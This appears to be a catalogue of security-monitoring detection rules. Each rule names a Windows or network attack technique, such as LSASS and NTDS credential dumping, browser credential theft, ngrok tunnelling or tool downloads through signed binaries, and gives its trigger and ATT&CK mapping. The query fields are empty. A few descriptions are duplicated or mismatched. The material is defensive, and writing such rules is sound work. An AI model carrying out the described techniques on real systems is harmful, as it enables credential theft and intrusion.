ATT&CK Category: Defense Evasion
ATT&CK Tag: Obfuscated Files or Information
ATT&CK ID: T1027
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Use of Control Panel Items
Trigger Condition: This alert is triggered whenever malicious use of a control panel item is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Control Panel
ATT&CK ID: T1218.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Use of Colorcpl Detected
Trigger Condition: Suspicious usage of colorcpl binary such as execution from non default path and creation of unusual files are detected.
ATT&CK Category: Persistence
ATT&CK Tag: T1574.001 - DLL Search Order Hijacking
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious File Download via Certreq
Trigger Condition: This alert is triggered whenever file is downloaded using certreq binary.
ATT&CK Category: Command and Control
ATT&CK Tag: T1105 - Ingress Tool Transfer
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Dump via Rundll32 and Comsvcs
Trigger Condition: This alert is triggered whenever a process dump using Rundll32 with Comsvcs DLL is detected.
ATT&CK Category: Defense Evasion, Credential Access
ATT&CK Tag: LSASS Memory, Rundll32
ATT&CK ID: T1003.001, T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious MachineGUID Query Detected
Trigger Condition: When reg.exe is used to detect query machine GUID. Reg.exe is a Windows binary that performs operations on registry subkey information and values in registry entries. MachineGUID is a unique identifier for a machine. Adversaries can use this technique to get MachineGuid information. Also, ransomware abuses this technique to keep track of infected systems using a unique ID.
ATT&CK Category: Discovery
ATT&CK Tag: T1082 - System Information Discovery
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Injection Via Mavinject Detected
Trigger Condition: When DLL is injected into a running process. Microsoft Application Virtualization Injector (Mavinject) is a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V). Adversaries can use mavinject to inject malicious DLL to obtain arbitrary code execution.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218.013 - Mavinject
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Use of Findstr Detected
Trigger Condition: When suspicious actions such as credential access, file download, or creation of alternate data stream using findstr are detected. Generally, it is used to search for strings in files or to filter command line output. Adversaries can exploit it for defense evasion. However, general administrative use of findstr can trigger false positives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious File Overwrite Using extrac32 Detected
Trigger Condition: Suspicious actions such as credential access, file download, or creation of alternate data stream using findstr are detected. Generally, it is used to search for strings in files or to filter command line output. Adversaries can exploit it for defense evasion. However, general administrative use of findstr can trigger false positives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution via IE per User Utility
Trigger Condition: When ie4uinit is executed from unusual file directories. Ie4uinit.exe (Internet Explorer (for) Each User Initialization) file is a software component of Internet Explorer by Microsoft Corporation. Adversaries generally abuse ie4uinit.exe to overwrite malicious programs on it and spread them via the internet to execute them on target machines as legitimate processes.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Proxy Execution via xWizard
Trigger Condition: When the execution of the xWizard tool with runwizard and CLSID arguments are utilized to achieve proxy execution. xWizard is Windows internal binary used to run the Windows component object model (COM). COM is operated to enable inter-process communication. Class ID (CLSID) is a unique number representing a single application component in windows. Adversaries can bypasses the defense mechanism by proxying the execution of malicious content via xWizard.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - System Binary Proxy Execution
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious MSHTA Process Pattern
Trigger Condition: Suspicious mshta.exe process patterns, such as binary run from a non-default path, mshta.exe binary masquerading as different binary, and execution of HTML application (HTA) masquerading as non-HTA file are detected. Mshta.exe is a utility that executes HTA files. HTAs are standalone applications based on HTML and VBScript that can access local system resources, run scripts and display dynamic content. Adversaries may abuse mshta.exe to evade defense by proxy, executing malicious files and Javascript or VBScript through a trusted Windows utility.
ATT&CK Category: Defense Evasion, Execution
ATT&CK Tag: Mshta, Native API
ATT&CK ID: T1218.005, T1106
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_COM Object Execution via Shell Extension CLSID Verification Host
Trigger Condition: When verclsid.exe is used to run COM object via GUID. Verclsid.exe (Verify COM Shell Extension CLSID) is a Microsoft Windows Native Shell Extension CLSID (Class ID) verification host responsible for verifying each shell extension before Windows Explorer or the Windows Shell uses them. Adversaries may abuse verclsid.exe to execute malicious payloads-COM Scriptlets, by running verclsid.exe and referencing files by Class ID (CLSID), a unique identification number used to identify COM objects.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Creation of Alternate Data Stream
Trigger Condition: When an alternate data stream is created. Alternate Data Stream (ADS) is the ability of an NTFS file system to store different streams of data, in addition to the default stream, which is used for a file. Attackers can leverage a little-known compatibility feature to hide hacking tools, keyloggers, and other malware on a compromised system and subsequently execute them undetected. Also, it can be used for data exfiltration. The alert requires the ADS_FILE_EXTENSIONS list to work.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1564.004 - NTFS File Attributes
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Alternate Data Stream Created using Findstr
Trigger Condition: When findstr is used to create an alternate data stream. Findstr is generally used to search for strings in files or to filter command line output. Adversaries can exploit it to create an alternate data stream for defense evasion. For this alert to work, the ADS_FILE_EXTENSIONS list is required.
ATT&CK Category: Defense Evasion
ATT&CK Tag: NTFS File Attributes
ATT&CK ID: T1564.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Ngrok RDP Tunnel Detected
Trigger Condition: Execution of Ngrok utility for tunneling RDP connection. Threat actors often use Ngrok to expose internal services to the internet, like making RDP publicly accessible. 16777216 artifact gets logged when an incoming RDP connection is established via ngrok.
ATT&CK Category: Command and Control
ATT&CK Tag: Protocol Tunneling
ATT&CK ID: T1572
Minimum Log Source Requirement: Windows
Query:
LP_Windows Defender Uninstall via PowerShell
Trigger Condition: When PowerShell is used to uninstall Windows Defender. PowerShell is a Microsoft task automation and configuration management program consisting of a command-line shell with its scripting language. Microsoft Defender Antivirus is an anti-malware component of Microsoft Windows. Adversaries can use this technique to avoid the detection of their malware.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1562 - Impair Defenses
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Hijacked Binary Execution via Settings Synchronizer
Trigger Condition: When SettingSyncHost is used to run hijacked binaries. SettingSyncHost is a Microsoft Windows host process that synchronizes system settings with other devices, including Internet Explorer, a mail application, OneDrive, Xbox and other application settings. Adversaries can exploit SettingSyncHost to run hijacked binaries and other specified files.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1574.008 - Path Interception by Search Order Hijacking
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Code Compilation via Visual Basic Command Line Compiler
Trigger Condition: This alert is triggered when successful compilation of code using Visual Basic Command Line Compiler is detected. “Vbc.exe” is Microsoft’s Visual Basic compiler used to compile programs from within the Visual Studio integrated development environment (IDE). Adversaries can leverage it to compile their malicious code on the system in order to bypass defensive counter measures. Legitimate use of this tool can trigger false positives but it is hardly used in enterprise environment thus, detection of use is considered suspicious.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1027.004 - Compile After Delivery
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious CLR Logs File Creation
Trigger Condition: When .NET code is executed via applications, such as mshta, cscript, wscript, regsvr32 and wmic. .NET is a developer platform with tools and libraries for building applications, including web, mobile, desktop, games, IoT, cloud, and microservices. Common Language Runtime in a .NET environment runs code and provides services to make the development process more manageable. The binaries included in the query are Windows internal binary which adversaries can use to execute their malicious scripts.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: T1055 - Process Injection
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_CLR DLL Loaded via Scripting Application
Trigger Condition: This alert is triggered whenever common language runtime(CLR) DLL is loaded via scripting applications.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218.005 - Mshta
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Microsoft Defender Logging Disabled
Trigger Condition: This alert is triggered whenever windows defender registry key is modify to disable defender’s logging.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1562 - Impair Defenses
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_LSA Protected Process Light Disabled
Trigger Condition: When modification of the registry value of Protection Process Light (PPL) to disable, it is detected. Protected Process can be accessed by executables that are digitally signed with a unique Windows Media, with administrator privilege. Protected Process Light is an extension of a protected process where a process can be assigned a different level of protection. Adversaries can use this technique to access the LSASS process and dump it to retrieve credentials.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1112 - Modify Registry
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Process Dump via Sqldumper Detected
Trigger Condition: This alert is triggered when a process dump via Sqldumper.exe is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: T1003 - OS Credential Dumping, T1003.001 - LSASS Memory
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: This alert is triggered whenever proxy execution of malicious payloads via Pubprn.bs is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1216.001 - PubPrn
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_File Download via IMEWDBLD
Trigger Condition: When a network connection is detected via the IMEWDBLD.exe binary. IMEWDBLD.EXE is a part of Microsoft Input Method Editor (IME). IME is a software component that enables a user to enter text in a language that can’t easily be typed using a standard keyboard. Adversaries can use this technique to download remote system payload.
ATT&CK Category: Command and Control
ATT&CK Tag: T1105 - Ingress Tool Transfer
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Remote Thread Created via Ttdinject
Trigger Condition: This alert is triggered whenever remote thread or process is created by ttdinject binary.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1127 - Trusted Developer Utilities Proxy Execution
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Proxy Download via OneDriveStandaloneUpdater
Trigger Condition: When OneDriveStandaloneUpdater registry value is modified. OneDriveStandaloneUpdater.exe is a binary that belongs to the Standalone Updater process and comes with Microsoft OneDrive. Adversaries can use this technique for transferring tools or other files to the victim system from a URL that is set in the OneDriveStandaloneUpdater registry. Registry auditing must be enabled and permission must be allowed for auditing the OneDriveStandaloneUpdater registry.
ATT&CK Category: Command and Control
ATT&CK Tag: T1105 - Ingress Tool Transfer
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Remote Connection Established via Msbuild
Trigger Condition: This alert is triggered whenever network connection is initiated via Msbuild while building an applications.
ATT&CK Category: Defense Evasion
ATT&CK Tag: MSBuild
ATT&CK ID: T1127.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Executables Started in Suspicious Folder
Trigger Condition: This alert is triggered whenever it detects execution of binaries from suspicious folder.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Curl Silent Mode Execution Detected
Trigger Condition: When curl is run in silent mode. Client URL (curl) is a command line tool that is used to transfer data to and from a server. Adversaries can use this technique to prevent showing file transfer progress and redirect output to a file.
ATT&CK Category: Command and Control
ATT&CK Tag: T1105 - Ingress Tool Transfer
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_High Volume of File Modification or Deletion in Short Span
Trigger Condition: When 30 file modifications or deletions are detected within a single minute. A large number of file modifications and deletions is an indicator of ransomware. Based on requirements and the number of detected false positives, a user can modify the number of events needed or the time frame. To generate logs, enable the auditing policy of the relevant folders. When a user/software modifies a large number of files this can result in a false positive. To reduce the number of false positives events exclude the process in the query.
ATT&CK Category: Impact
ATT&CK Tag: T1565 - Data Manipulation
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution of Temporary Files Via Office Application
Trigger Condition: When Office applications creates a child process that executes a file with .tmp extension. Adversaries use this technique to avoid detection by using the legit application to run a payload that is masquerading as a temporary file.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1036 - Masquerading
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious Image Loaded Via Excel
Trigger Condition: When an unsigned image is loaded via Excel. An XLL file is an add-in used by Microsoft Excel. It contains extra functions, templates, or other tools that enhance the capabilities of Excel. Examples of add-ins include custom chart generators and template managers. Adversaries can use this technique to load their malicious unsigned add-ins to execute their payload or download malware from a remote server.
ATT&CK Category: Persistence
ATT&CK Tag: T1137 - Office Application Startup, T1137.001 - Office Template Macros
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Malicious Chrome Extension Detected
Trigger Condition: When malicious Chrome extension IDs are detected by Osquery. This analytic relies on chrome_extensions table and requires analysts to keep an up-to-date list of malicious chrome extension IDs.
ATT&CK Category: Persistence
ATT&CK Tag: T1176 - Browser Extensions
Minimum Log Source Requirement: Windows, Unix
Query:
LP_Chrome Extension Installed Outside of the Webstore
Trigger Condition: When malicious chrome extensions are installed from outside the official Chrome webstore. Adversaries can manually install the browser extension via their batch, PowerShell or VBS scripts. Analysts need to make sure they place the correct event types in the query.
ATT&CK Category: Persistence
ATT&CK Tag: T1176 - Browser Extensions
Minimum Log Source Requirement: Windows, Unix
Query:
LP_Browser Credential Files Accessed
Trigger Condition: When access to a browser (Chrome, Edge & Firefox) using stored credential is detected. When a user saves any credentials in the browser, those credentials are stored in files that are included in the query. Adversaries can access those files in an attempt to retrieve the stored credentials.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1202 - Indirect Command Execution
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Exchange ProxyShell Pattern Detected
Trigger Condition: When a URL pattern associated with ProxyShell exploitation attempts (both successful and failure) against Exchange servers is detected. ProxyShell is an attack chain that exploits three known vulnerabilities in Microsoft Exchange: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. Adversaries may exploits these vulnerabilities to perform remote code execution.
ATT&CK Category: Initial Access
ATT&CK Tag: T1190 - Exploit Public-Facing Application
Minimum Log Source Requirement: Webserver
Query:
LP_Successful Exchange ProxyShell Attack
Trigger Condition: When a URL pattern and status code associated with a successful ProxyShell exploitation attack against Exchange servers are detected. ProxyShell is an attack chain that exploits three known vulnerabilities in Microsoft Exchange: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. Adversaries may exploit these vulnerabilities to perform remote code execution.
ATT&CK Category: Initial Access
ATT&CK Tag: T1190 - Exploit Public-Facing Application
Minimum Log Source Requirement: Webserver
Query:
LP_DLL Loaded Via AllocConsole and RunDLL32
Trigger Condition: When DLL loading through allocconsole function and rundll32. AllocConsole is a Windows internal function that allocates a new console for the calling process. Rundll32.exe is a Windows internal binary that loads and runs 32-bit dynamic-link libraries (DLLs). Adversaries can use this technique to execute their payload using rundll32 to load a malicious DLL by invoking the AllocConsole function.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218.011 - Rundll32
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Active Directory Database Dump Attempt
Trigger Condition: When an attempt to dump the ntds.dit file is detected. NTDS.dit file is a database that stores the Active Directory data (including users, groups, security descriptors and password hashes). Adversaries can use this technique to retrieve credentials and obtain other domain information.
ATT&CK Category: Credential Access
ATT&CK Tag: T1003.003 - NTDS
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Usage of Web Request Command
Trigger Condition: Usage of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via commandline.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows, Windows Sysmon, PowerShell
Query:
LP_Reconnaissance Activity with Nltest
Trigger Condition: When possible reconnaissance activity via nltest binary is detected. Nltest is a Windows command-line utility that comes with a Windows Server, which is used to list domain controllers and enumerate domain trusts. The binary is available if you have installed the AD DS or the AD LDS server role. It is also available if you install the Active Directory Domain Services Tools that are part of the Remote Server Administration Tools (RSAT). Adversaries can use this technique to discover domain controllers, users and query the domain trust relationship.
ATT&CK Category: Discovery
ATT&CK Tag: T1016 - System Network Configuration Discovery, T1482 - Domain Trust Discovery
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Regsvr32 Network Activity Detected
Trigger Condition: When network connections and Application Layer Protocol, DNS queries initiated via regsvr32 binary are detected. Regsvr32 is a command-line utility to register and unregister the Windows Registry’s OLE controls, such as DLLs and ActiveX controls. Adversaries utilized regsvr32 to run their malicious DLL, which downloads their other stager payload.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Regsvr32
ATT&CK ID: T1218.010
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Privilege Escalation via Kerberos KrbRelayUp
Trigger Condition: KrbRelayUp performs a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced. KrbRelayUp is a wrapper that can streamline the use of some features in Rubeus, KrbRelay, SCMUACBypass, PowerMad/SharpMad, Whisker and ADCSPwn tools in attacks.
ATT&CK Category: Credential Access, Lateral Movement
ATT&CK Tag: Pass the Ticket, Kerberoasting
ATT&CK ID: T1550.003, T1558.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Insecure Policy Set via Set-ExecutionPolicy
Trigger Condition: Set-ExecutionPolicy command utilized to set insecure policies such as Unrestricted, bypass and RemoteSigned is detected. Adversaries can utilize this technique to change the execution policy in order to execute their choice of malicious powershell scripts.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Network Connection to Suspicious Server
Trigger Condition: Communication between hosts and domains mentioned in the query’s list. The query will search for logs generated from the Windows system or proxies and firewalls. The sites mentioned in the query are either file-storing or hosting sites. Adversaries have utilized these sites in many campaigns to upload and download data.
ATT&CK Category: Command and Control
ATT&CK Tag: Ingress Tool Transfer
ATT&CK ID: T1105
Minimum Log Source Requirement: Windows Sysmon, Firewall, Proxy Server, WAF
Query:
LP_Activity Related to NTDS Domain Hash Retrieval
Trigger condition: Copying of the* nods.dit* file, which is a database that stores Active Directory data, such as users, groups, security descriptors, and password hashes.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, NTDS
ATT&CK ID: T1003,T1003.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Application Shimming - File Access Detected
Trigger condition: This alert is triggered whenever installation of new shims or registration of shims are detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Event Triggered Execution, Application Shimming
ATT&CK ID: T1546, T1546.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Audio Capture Detected
Trigger condition: The alert is triggered whenever suspicious audio capture is detected.
ATT&CK Category: Collection
ATT&CK Tag: Audio Capture
ATT&CK ID: T1123
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Auditd High Volume of File Modification or Deletion in Short Span
Trigger Condition: This alert is triggered whenever 30 file modification or deletion is detected in span of 1 minute.
Minimum Log Source Requirement: Unix
Query:
LP_Autorun Keys Modification Detected
Trigger Condition: This alert is triggered whenever it detects modification of autostart extensibility point (ASEP) in registry.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_BlueMushroom DLL Load Detected
Trigger Condition: This alert is triggered whenever it detects a suspicious DLL loading from the AppData Local path.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Capture a Network Trace with netsh
Trigger Condition: This alert is triggered whenever it detects a network trace capture via netsh.exe trace functionality.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: This alert is triggered whenever Osquery detects chrome extension installed with “devtools” permission. Look for unusual extensions installed with this permission and also check if the extension was installed from the webstore.
Minimum Log Source Requirement: Windows, Unix
Query:
LP_Citrix ADC VPN Directory Traversal Detected
Trigger Condition: This alert is triggered whenever exploitation attempt of directory traversal vulnerability (CVE-2019-19781) in Citrix ADC is detected.
Minimum Log Source Requirement: Web Server, Firewall
Query:
LP_Cmdkey Cached Credentials Recon Detected
Trigger Condition: This alert is triggered whenever it detects usage of cmdkey to look for cached credentials.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Command Obfuscation via Environment Variable Concatenation Reassembly
Trigger Condition: This alert is triggered whenever command obfuscation in command prompt via environment variable concatenation reassembly is detected.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Control Panel Items - Registry Detected
Trigger Condition: This alert is triggered whenever modification of Control Panel Registry sub-keys are detected.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Credentials Access in Files Detected
Trigger Condition: This alert is triggered whenever command line arguments containing pattern to search “pass” in files are detected.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Default Blocked Outbound Traffic followed by Allowed Event
Trigger Condition: This alert is triggered whenever blocked outbound traffic is followed by allowed traffic.
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Default Connection Attempts on Closed Port
Trigger Condition: This alert is triggered whenever connection is attempted on closed ports. ALERT_OPEN_PORTS list needs to be updated with open ports.
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Default Unapproved Port Activity Detected
Trigger Condition: This alert is triggered whenever a user uses ports that are not approved for use. It monitors traffic where the source_port, destination_port, or any port involved matches a port listed in the “UNAPPROVED_PORT” static list. Attackers may use unapproved ports to bypass security controls, such as firewalls or intrusion detection systems, which often monitor and restrict traffic on standard or known ports. The “UNAPPROVED_PORT” list is required to update on the organizational needs.
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Direct Autorun Keys Modification Detected
Trigger Condition: This alert is triggered whenever it detects a modification to the direct autorun keys on a system (ASEP) in the registry using reg.exe.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Empire PowerShell UAC Bypass Detected
Trigger Condition: This alert is triggered whenever it detects some Empire Command and Scripting Interpreter, PowerShell UAC bypass methods. Empire is a post-exploitation framework featuring a fully PowerShell-based agent for Windows (version 2.0) and a Python-based agent for Linux and OS X (compatible with Python 2.6 and 2.7).
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution in Outlook Temp Folder Detected
Trigger Condition: This alert is triggered whenever it detects a suspicious program execution in Outlook temp folder.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution of Temporary Files via Office Application
Trigger Condition: This alert is triggered whenever office application creates a child process which executes a file with “.tmp” extension.
Minimum Log Source Requirement: Windows Sysmon, windows
Query:
LP_External Disk Drive or USB Storage Device Detected
Trigger Condition: This alert is triggered whenever it detects external diskdrives or plugged in USB devices.
Minimum Log Source Requirement: Windows
Query:
LP_File Downloaded from Suspicious URL Using GfxDownloadWrapper
Trigger Condition: This alert is triggered when download of files from suspicious (non-standard) url using GfxDownloadWrapper.exe is detected.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Hidden Files and Directories Detected
Trigger Condition: This alert is triggered whenever it detects the use of attrib.exe binary to change a file property to hidden or system.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_IIS Native-Code Module Command Line Installation
Trigger Condition: This alert is triggered whenever it detects suspicious installation of IIS native-code module via the command line. IIS Native-Code module is a component of Microsoft’s Internet Information Services (IIS) that allows developers to extend IIS functionality as per the need. Adversaries can leverage it as a covert backdoor into servers, which allows them to hide deep in target environments and provide them with a durable persistence mechanism. However, Legitimate installation from the command line might also trigger false positives.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Install Root Certificate
Trigger Condition: This alert is triggered when a root certificate or related registry value is set up or modified.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_LanmanServer Registry Value Modified
Trigger Condition: This alert is triggered whenever lanmanserver registry value -MaxMpxCt, is modified.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Large ICMP Traffic
Trigger Condition: This attack is triggered when ICMP Datagrams with size>1024 is received.
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Lsass Memory Dump with MiniDumpWriteDump API Detected
Trigger Condition: This alert is triggered whenever it detects the use of MiniDumpWriteDump API for dumping lsass.exe memory in a stealthy way. Tools like ProcessHacker and some attacker tradecraft use this API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker’s machine.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_MSHTA Spawned by SVCHOST Detected
Trigger Condition: This alert is triggered whenever MSHTA binary is spawned by Svchost process.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious Use of Print Binary Detected
Trigger Condition: This alert is triggered whenever print.exe is used for remote file copy.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Malware Threat Connection to Malicious Destination
Trigger Condition: This alert is triggered when outbound connection to malicious sources is made by any hosts.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Memory Dump via Adplus
Trigger Condition: This alert is triggered whenever LSASS process dump via adplus.exe is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_MiniNt Registry Key Addition
Trigger Condition: This alert is triggered whenever it detects the addition of a key ‘MiniNt’ to the registry.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Netsh Port Forwarding Detected
Trigger Condition: This alert is triggered whenever it detects netsh commands that configure a port forwarding.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Network Share Discovery
Trigger Condition: This alert is triggered when network share discovery activities are detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Non Interactive PowerShell Execution
Trigger Condition: This alert is triggered whenever it detects non-interactive Command and Scripting Interpreter, PowerShell activity. Non-interactive powershell is an execution of powershell.exe without explorer.exe as a parent.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Non-Existent User Login Attempt Detected
Trigger Condition: This alert is triggered whenever 8 non-existent user login attempt on SSH service is detected within 1 minute.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Unix
Query:
LP_NotPetya Ransomware Activity Detected
Trigger Condition: This alert is triggered whenever it detects NotPetya ransomware activity where the extracted passwords are passed back to the main module via a named pipe, the file system journal of drive C is deleted and Windows event logs are cleared using wevtutil binary.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Obfuscation Script Usage via MSHTA to Execute Vbscript
Trigger Condition: This alert is triggered whenever execution of invoke-obfuscation powershell script with mshta to execute vbscript is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: This Alert is triggered whenever unauthorized transfer of sensitive data is detected using mail applications,cloud applications or other medium. Lists included are RESIGNED_EMPLOYEES,KNOWN_DOMAINS,CLOUD_APPLICATIONS.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Possible Emotet Activity Detected
Trigger Condition: This alert is triggered whenever it detects process creation events related to Emotet.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible File Transfer Using Finger Detected
Trigger Condition: This alert is triggered whenever execution of Finger.exe is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Impacket Lateral Movement Detected
Trigger Condition: This alert is triggered whenever it detect instances of lateral movement using the Impacket framework, specifically when utilizing the wmiexec, dcomexec, atexec, and smbexec tools.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible SquiblyTwo Detected
Trigger Condition: This alert is triggered whenever it detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
Trigger Condition: This alert is triggered when usage of suspicious tools to bypass User Access Control (UAC) is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows
Query:
LP_PowerShell ADRecon Execution
Trigger Condition: This alert is triggered whenever the execution of the ADRecon PowerShell script for AD reconnaissance is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows
Query:
LP_PowerShell Encoded FromBase64String Detected
Trigger Condition: This alert detects the use of the .NET method “FromBase64String” to decode a Base64-encoded string. Base64 is a widely used encoding scheme that represents binary data in an ASCII string format. It is often used to encode data for transfer over networks or to store data in databases or files.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
